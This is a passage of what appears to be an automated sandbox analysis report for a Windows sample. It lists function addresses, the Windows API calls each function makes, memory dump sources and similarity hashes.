Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: d386b4f7722a9fc0b3e674156dc7e61f4f639ac5e84bb701d39eff38a64f1088
Instruction ID: ed1b5fd3ae5a4b8d786e99ed45286a4aa5f3ed9e37243dcd300ca3a35e9a8f94
Opcode Fuzzy Hash: d386b4f7722a9fc0b3e674156dc7e61f4f639ac5e84bb701d39eff38a64f1088
Instruction Fuzzy Hash: 2441A1346406126FEB20AF24C88AF657BE6BF85718F548448F5169F3D2D772ED828B90

Function 0054B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7603d5051b786705936bdacf40334e1075eeceb1d4241edf7a44a93e8efea392
Instruction ID: f48dd1b68af5ac0b5d65c0a7d208a9d4479702f63bf4235af218ce3b1c1782fe
Opcode Fuzzy Hash: 7603d5051b786705936bdacf40334e1075eeceb1d4241edf7a44a93e8efea392
Instruction Fuzzy Hash: 2A41E675A00705AFEB249F38CC46BEABFA9FBC8714F10452AF555DB682D771D9018780

Function 005856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00585783
GetLastError.KERNEL32(?,00000000), ref: 005857A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005857CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005857FA

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: b56dcd06be71e784add282c570a71e1f1363500182236f832993702df914d5a6
Instruction ID: 97622cd1184923acccc44fbc011619ff12179e0308cad823a8e074549deb3814
Opcode Fuzzy Hash: b56dcd06be71e784add282c570a71e1f1363500182236f832993702df914d5a6
Instruction Fuzzy Hash: 5C410839600611DFDB11EF15C449A5EBFF2BF89320B198488E84AAB362DB30FD41DB91

Function 0054D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00536D71,00000000,00000000,005382D9,?,005382D9,?,00000001,00536D71,?,00000001,005382D9,005382D9), ref: 0054D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0054D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0054D9AB
__freea.LIBCMT ref: 0054D9B4

Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 580bf88760472203997ed1162c675482d3fdf208579fbfb91a578e2191407046
Instruction ID: dc9ba10fea6b5aaf33a3f7abd3d426312178b81510ae4826cd85b99abcd707ec
Opcode Fuzzy Hash: 580bf88760472203997ed1162c675482d3fdf208579fbfb91a578e2191407046
Instruction Fuzzy Hash: 6E31A872A0020AABDF248F64DC49AEE7FB5FB41354F050169EC04D62A0EB358D54CBA0

Function 005A52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 005A5352
GetWindowLongW.USER32(?,000000F0), ref: 005A5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A53A8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
Instruction ID: 25cbc3b5dc07b2c93bd2823fcccbc58678022017fe9f4e6f55f5a47f6e17b9a6
Opcode Fuzzy Hash: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
Instruction Fuzzy Hash: 3331C134A55A08EFEF249E14CC45FEC3F65BB96390F984803FA11961E1E7B09940AB41

Function 0057AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0057ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0057AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0057AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0057ACC6

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
Instruction ID: 48b198dd83313fb857cdd5a0f827b44f9b8d15db2bf5d32bf5664fbce874f750
Opcode Fuzzy Hash: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
Instruction Fuzzy Hash: A631E730A00618BFFF26CB65A809BFE7EA9BBC5310F04C61AF489561D1C3758D85A752

Function 005A7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 005A769A
GetWindowRect.USER32(?,?), ref: 005A7710
PtInRect.USER32(?,?,005A8B89), ref: 005A7720
MessageBeep.USER32(00000000), ref: 005A778C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
Instruction ID: 027ccd4b9684eaa5016031f3e9ebcee76028b9eb94039745946855cd2a3821d0
Opcode Fuzzy Hash: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
Instruction Fuzzy Hash: 3E418738A096599FCB01CF58CC94EADBFF4FB9E300F1940A8E854DB261C730A985DB90

Function 005A16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 005A16EB

Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65

GetCaretPos.USER32(?), ref: 005A16FF
ClientToScreen.USER32(00000000,?), ref: 005A174C
GetForegroundWindow.USER32 ref: 005A1752

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
Instruction ID: 697dcada456007c4ff9dd02e4da64457bfeb40fe9f98f048e87ef06e840727e9
Opcode Fuzzy Hash: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
Instruction Fuzzy Hash: 50310C75D00249AFDB04EFA9C8858EEBBF9FF89304B5480A9E415A7211D6319E45CBA0

Function 0057D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
Process32NextW.KERNEL32(00000000,?), ref: 0057D52F
CloseHandle.KERNEL32(00000000), ref: 0057D5DC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 48295adde6f564ff33f5dd67e6fe03865055bdf0c57b277dc5e1292b29985055
Instruction ID: 0cbd07d4ea5bc414d7b2edae0afe1046bfdd6431b579897f7af5bc7426a4cc97
Opcode Fuzzy Hash: 48295adde6f564ff33f5dd67e6fe03865055bdf0c57b277dc5e1292b29985055
Instruction Fuzzy Hash: 2D318D71108301AFD301EF54D885AAFBFF8BFD9344F10492DF585821A1EB719988DBA2

Function 005A8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2

GetCursorPos.USER32(?), ref: 005A9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00567711,?,?,?,?,?), ref: 005A9016
GetCursorPos.USER32(?), ref: 005A905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00567711,?,?,?), ref: 005A9094

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
Instruction ID: 78e1e6217114ea4b349123317358e3a9b9251f61f825ac4805193c2b6f17d459
Opcode Fuzzy Hash: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
Instruction Fuzzy Hash: FB217F35600128EFDB298F94D898EEE7FB9FF8B390F144055F9058B2A1C7319990EB60

Function 0057D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,005ACB68), ref: 0057D2FB
GetLastError.KERNEL32 ref: 0057D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0057D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005ACB68), ref: 0057D376

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
Instruction ID: dd30ee54f9184e214da932fee3480280e124b6e1bb3a7ee98d63dbb2bdbe9ca2
Opcode Fuzzy Hash: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
Instruction Fuzzy Hash: AF2180745042029FC700DF28D8858AA7FF4BE96324F508E1DF499C32A1DB319949DBA3

Function 00571571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
Part of subcall function 00571014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
Part of subcall function 00571014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
Part of subcall function 00571014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005715BE
_memcmp.LIBVCRUNTIME ref: 005715E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00571617
HeapFree.KERNEL32(00000000), ref: 0057161E

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
Instruction ID: d5148ed50c7442a1c90b073f158862b54e62c827c84e81460b17fbc756df0d60
Opcode Fuzzy Hash: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
Instruction Fuzzy Hash: 9D219C31E00509AFDF14DFA8D948BEEBBB8FF40344F188459E445AB241E730AA04EB54

Function 005A2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 005A280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005A2840

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
Instruction ID: 529f2b07e0fae0fc4c9482cf087dd956be51e61ec344ad3607c5499105e7dddb
Opcode Fuzzy Hash: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
Instruction Fuzzy Hash: AA21A435604512AFE7149B28C846FAA7F95FF86324F148158F4268B6D2CB75FD82CB90

Function 005778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00578D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578D8C
Part of subcall function 00578D7D: lstrcpyW.KERNEL32(00000000,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00578DB2
Part of subcall function 00578D7D: lstrcmpiW.KERNEL32(00000000,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577923
lstrcpyW.KERNEL32(00000000,?,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577984

Strings

cdecl, xrefs: 0057797B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 716f0494483387d0945d2980e4ef76ff86f5678853b6d289869f9928cd272483
Instruction ID: c69ba510e992c9c8427f7d54099250042fd95d3cfc8c97201ea3779e63ac3bd1
Opcode Fuzzy Hash: 716f0494483387d0945d2980e4ef76ff86f5678853b6d289869f9928cd272483
Instruction Fuzzy Hash: E011EC3A201706AFCB155F34F849D7B7BA9FF99350B50802AF946C72A4EF319811E791

Function 005A5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 005A56BB
_wcslen.LIBCMT ref: 005A56CD
_wcslen.LIBCMT ref: 005A56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
Instruction ID: 4bcfde3f289dc3d914e2ea0f8c620b45377d4e0ceca0dd4ffae8d9c544bfb49c
Opcode Fuzzy Hash: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
Instruction Fuzzy Hash: F611B1716006099ADF20DF658C85EEE7FACFF56760F104426F915DA081FB709A84CBA0

Function 00571A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00571A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A8A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
Instruction ID: 0577911197ff0d9eda2f5f1547808625cc7fdeb60b4ac0123afe4dfc1f0706d7
Opcode Fuzzy Hash: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
Instruction Fuzzy Hash: 5D113C3AD01219FFEB10DBA8CD85FADBB78FB04750F204091E605B7290D6716E50EB94

Function 0057E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0057E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0057E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0057E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0057E24D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
Instruction ID: 7a3988581c14abb129092fbf58bd38d92f583a2ca32feb2387fa17234d5a64a6
Opcode Fuzzy Hash: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
Instruction Fuzzy Hash: 2F112B76A04354BBC7059FA8EC4AA9F7FADEB5A310F008655F819D7291D670CD0897A0

Function 0053D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0053CFF9,00000000,00000004,00000000), ref: 0053D218
GetLastError.KERNEL32 ref: 0053D224
__dosmaperr.LIBCMT ref: 0053D22B
ResumeThread.KERNEL32(00000000), ref: 0053D249

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
